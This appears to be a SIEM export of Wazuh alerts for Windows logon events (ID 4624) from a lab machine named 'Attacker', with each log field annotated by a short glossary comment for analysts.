data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.439568 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:05.8916950Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43752 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.446906 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:08.0405533Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43755 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10720 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.454244 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:09.1230899Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43757 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.461580 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:13.4677661Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43759 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.468918 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:17.3513724Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43763 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x25F1ED7
Linked Logon ID: 0x25F285D
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x25f1ed7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x25f285d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.476639 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
